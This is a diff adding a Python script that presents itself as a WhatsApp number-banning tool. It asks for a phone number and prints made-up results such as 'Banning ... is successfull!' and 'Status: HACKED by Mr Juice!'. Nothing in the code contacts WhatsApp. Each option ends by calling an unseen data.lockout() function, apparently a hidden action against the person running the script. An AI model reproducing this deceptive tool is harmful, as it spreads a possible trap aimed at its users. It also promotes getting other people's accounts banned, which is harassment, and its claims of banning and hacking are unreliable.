|
| 1 | +# Whatsapp number banning tool |
| 2 | +# Created by Mr Juice |
| 3 | +# |
| 4 | +import os |
| 5 | +import time |
| 6 | +import sys |
| 7 | +import data |
| 8 | + |
| 9 | +print("Installing packages . . .") |
| 10 | +os.system("clear") |
| 11 | +os.system("pkg install cmatrix") |
| 12 | +os.system("pip3 install colorama") |
| 13 | +os.system("clear") |
| 14 | +# |
| 15 | +# Now importing colorama |
| 16 | +# |
| 17 | +import colorama |
| 18 | +from colorama import Fore |
| 19 | +# |
| 20 | +def delay_print(s): |
| 21 | + for c in s: |
| 22 | + sys.stdout.write(c) |
| 23 | + sys.stdout.flush() |
| 24 | + time.sleep(0.05) |
| 25 | +def banner_display(): |
| 26 | + print(f''' {Fore.CYAN} |
| 27 | + _ _ _ |
| 28 | +__ __| |__ __ _ | |_ ___ | |__ __ _ _ __ |
| 29 | +\ \ /\ / /| '_ \ / _` || __|/ __|| '_ \ / _` || '_ \ |
| 30 | + \ V V / | | | || (_| || |_ \__ \| |_) || (_| || | | | |
| 31 | + \_/\_/ |_| |_| \__,_| \__||___/|_.__/ \__,_||_| |_| |
| 32 | + {Fore.YELLOW} |
| 33 | +Coded by Mr Juice |
| 34 | +Chat Me https://bio.link/mrjuice |
| 35 | +Whatsapp number banning tool |
| 36 | +{Fore.CYAN} |
| 37 | +************************************************* |
| 38 | + {Fore.WHITE} ''') |
| 39 | +banner_display() |
| 40 | +# |
| 41 | +# |
| 42 | +def program(): |
| 43 | + number = input("[+] pPut Number: +263") |
| 44 | + realnumber = "+263"+number |
| 45 | + check = number.isnumeric() |
| 46 | + lennber = len(number) |
| 47 | + if (check == True): |
| 48 | + if (lennber < 10 or lennber > 10): |
| 49 | + delay_print(f"{Fore.RED}Number must be 10 digits\n") |
| 50 | + program() |
| 51 | + elif (lennber==10): |
| 52 | + delay_print(f"{Fore.YELLOW}1) Ban number\n") |
| 53 | + delay_print(f"{Fore.YELLOW}2) Information about this number\n") |
| 54 | + option = input(f"{Fore.YELLOW}[+] Choose an option: ") |
| 55 | + if (option=="1"): |
| 56 | + delay_print(f"{Fore.YELLOW}Are you sure to ban "+realnumber+"?\n") |
| 57 | + yesorno1 = input("(Y/N): ") |
| 58 | + delay_print("Banning of "+realnumber+" is successfull!") |
| 59 | + data.lockout() |
| 60 | + |
| 61 | + elif (option=="2"): |
| 62 | + delay_print(f"{Fore.YELLOW}Gather information for "+realnumber+"?\n") |
| 63 | + yesorno2 = input("(Y/N): ") |
| 64 | + delay_print("Name: 47hxl-53r\nStatus: HACKED by Mr Juice!") |
| 65 | + data.lockout() |
| 66 | + |
| 67 | + else: |
| 68 | + delay_print(f"{Fore.RED}It's not an option\n") |
| 69 | + program() |
| 70 | + |
| 71 | + |
| 72 | + else: |
| 73 | + delay_print(f"{Fore.RED}Number is incorrect... Please try again . . .\n") |
| 74 | + print("") |
| 75 | + program() |
| 76 | +program() |
0 commit comments